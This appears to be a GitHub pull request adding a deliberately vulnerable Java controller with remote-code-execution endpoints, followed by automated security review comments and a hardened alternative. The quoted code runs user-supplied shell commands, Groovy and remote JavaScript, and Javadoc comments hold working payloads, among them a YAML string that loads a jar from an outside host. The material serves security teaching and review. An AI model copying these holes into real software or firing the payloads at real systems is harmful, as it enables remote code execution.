
Conversation

@cccfeng (Owner) commented Apr 28, 2025

No description provided.

@cccfeng (Owner, Author) commented Apr 28, 2025

@CodeRabbit pause

@coderabbitai bot commented Apr 28, 2025

✅ Actions performed

Reviews paused.

Repository owner deleted a comment from coderabbitai bot Apr 28, 2025
@cccfeng (Owner, Author) commented Apr 28, 2025

@CodiumAI-Agent /describe

Repository owner deleted a comment from sonarqubecloud bot Apr 28, 2025
@QodoAI-Agent commented

Title

add Rce.java test qodo

PR Type

Enhancement

Description

  • New RCE REST controller with multiple exec endpoints
  • Command execution via Runtime and ProcessBuilder
  • Script evaluation: JS, YAML (unsafe/safe), Groovy
  • Demo main method for command touch

Changes walkthrough 📝

Relevant files (Enhancement)

Rce2.java (src/main/java/org/joychou/controller/Rce2.java), +138/-0
Introduce RCE controller with various exec endpoints
  • Introduce Rce controller class in org.joychou.controller
  • Add /runtime/exec and /ProcessBuilder command exec endpoints
  • Implement /jscmd, /vuln/yarm, /sec/yarm, /groovy script eval endpoints
  • Include main method demo for runtime exec

@cccfeng (Owner, Author) commented Apr 28, 2025

@CodiumAI-Agent /review

@QodoAI-Agent commented

PR Reviewer Guide 🔍

Here are some key observations to aid the review process:

⏱️ Estimated effort to review: 2 🔵🔵⚪⚪⚪
🧪 No relevant tests
🔒 Security concerns

Remote Code Execution:
Multiple endpoints directly execute user-supplied content (shell commands, JavaScript, Groovy, YAML payloads) without any input validation or sandboxing, introducing severe RCE vulnerabilities.

⚡ Recommended focus areas for review

Unrestricted Command Execution

Endpoints CommandExec and processBuilder execute arbitrary shell commands from user input without validation or sanitization, allowing full RCE.

@GetMapping("/runtime/exec")
public String CommandExec(String cmd) {
    Runtime run = Runtime.getRuntime();
    StringBuilder sb = new StringBuilder();

    try {
        Process p = run.exec(cmd);
        BufferedInputStream in = new BufferedInputStream(p.getInputStream());
        BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
        String tmpStr;

        while ((tmpStr = inBr.readLine()) != null) {
            sb.append(tmpStr);
        }

        if (p.waitFor() != 0) {
            if (p.exitValue() == 1)
                return "Command exec failed!!";
        }

        inBr.close();
        in.close();
    } catch (Exception e) {
        return e.toString();
    }
    return sb.toString();
}

Insecure YAML Deserialization

The yarm endpoint uses SnakeYAML's default loader to parse untrusted YAML content, exposing the application to deserialization attacks.

@GetMapping("/vuln/yarm")
public void yarm(String content) {
    Yaml y = new Yaml();
    y.load(content);
}

Dynamic Script Evaluation

Endpoints jscmd and groovyshell load and execute remote scripts via Nashorn and GroovyShell without sandboxing, enabling arbitrary code execution.

@GetMapping("/jscmd")
public void jsEngine(String jsurl) throws Exception{
    // js nashorn javascript ecmascript
    ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
    Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
    String cmd = String.format("load(\"%s\")", jsurl);
    engine.eval(cmd, bindings);
}


/**
 * http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager%20[!!java.net.URLClassLoader%20[[!!java.net.URL%20[%22http://test.joychou.org:8086/yaml-payload.jar%22]]]]
 * yaml-payload.jar: https://github.com/artsploit/yaml-payload
 *
 * @param content payloads
 */
@GetMapping("/vuln/yarm")
public void yarm(String content) {
    Yaml y = new Yaml();
    y.load(content);
}

@GetMapping("/sec/yarm")
public void secYarm(String content) {
    Yaml y = new Yaml(new SafeConstructor());
    y.load(content);
}

/**
 * http://localhost:8080/rce/groovy?content="open -a Calculator".execute()
 * @param content groovy shell
 */
@GetMapping("groovy")
public void groovyshell(String content) {
    GroovyShell groovyShell = new GroovyShell();
    groovyShell.evaluate(content);
}
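The two concrete mitigations the review points at, shown as a stand-alone class rather than as controller code: parsing untrusted YAML through SnakeYAML's SafeConstructor (as the PR's secYarm method already does) so that a class-tagged document is rejected instead of instantiated, and running commands only from a fixed allowlist through ProcessBuilder with an argument vector and no shell. This is an added example, not code from the PR or from the joychou project; the class name RceHardeningDemo, the methods loadSafely and runAllowlisted, the ALLOWED_COMMANDS table and the sample inputs are all constructed here. It assumes SnakeYAML 1.x (the no-argument SafeConstructor used in the PR), Java 11 or later, and a Unix-like host for the date and df commands in main.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.Map;
import java.util.concurrent.TimeUnit;

import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

/**
 * Hardened counterparts to the /vuln/yarm and /runtime/exec endpoints.
 * Added example (hypothetical class), not part of the PR; assumes SnakeYAML 1.x.
 */
public class RceHardeningDemo {

    // SafeConstructor knows only the standard YAML tags (str, int, seq, map, ...).
    // A global tag naming a Java class has no registered constructor, so load()
    // throws instead of reflectively creating the class.
    private static final Yaml SAFE_YAML = new Yaml(new SafeConstructor());

    /** Parses untrusted YAML into plain Java collections, or throws YAMLException. */
    public static Object loadSafely(String content) {
        return SAFE_YAML.load(content);
    }

    // The only commands a request may trigger. The request supplies a key, never
    // the program or its arguments. (Constructed allowlist for the demo.)
    private static final Map<String, List<String>> ALLOWED_COMMANDS = Map.of(
            "date", List.of("date"),
            "disk", List.of("df", "-h"));

    /**
     * Runs one allowlisted command with a fixed argument vector and no shell.
     * ProcessBuilder(List) passes arguments verbatim to the program; nothing
     * interprets metacharacters such as ';' or '|'.
     */
    public static String runAllowlisted(String name) throws IOException, InterruptedException {
        List<String> argv = ALLOWED_COMMANDS.get(name);
        if (argv == null) {
            throw new IllegalArgumentException("command not allowed: " + name);
        }
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        // Drain output before waiting so a chatty child cannot block on a full pipe.
        byte[] out = p.getInputStream().readAllBytes();
        if (!p.waitFor(10, TimeUnit.SECONDS)) {
            p.destroyForcibly();
            throw new IOException("command timed out: " + name);
        }
        return new String(out, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: a benign document and a class-tagged document of
        // the shape the PR's Javadoc describes, using a harmless class name.
        String benign = "name: demo\nports: [80, 443]\n";
        String tagged = "!!java.lang.Object {}";

        System.out.println("benign -> " + loadSafely(benign));
        try {
            loadSafely(tagged);
            System.out.println("tagged -> accepted (unexpected)");
        } catch (YAMLException e) {
            // Expected: ConstructorException, a YAMLException subclass
            System.out.println("tagged -> rejected: " + e.getClass().getSimpleName());
        }

        System.out.print("date -> " + runAllowlisted("date"));
        try {
            runAllowlisted("date; id");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The YAML half is the check a reviewer would ask for on the /vuln/yarm endpoint: the same load() call, but with a constructor that has no mapping for arbitrary class tags. The command half removes the vulnerability class entirely rather than trying to sanitize cmd, which is why the user-controlled value is a lookup key and never reaches the argument vector.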
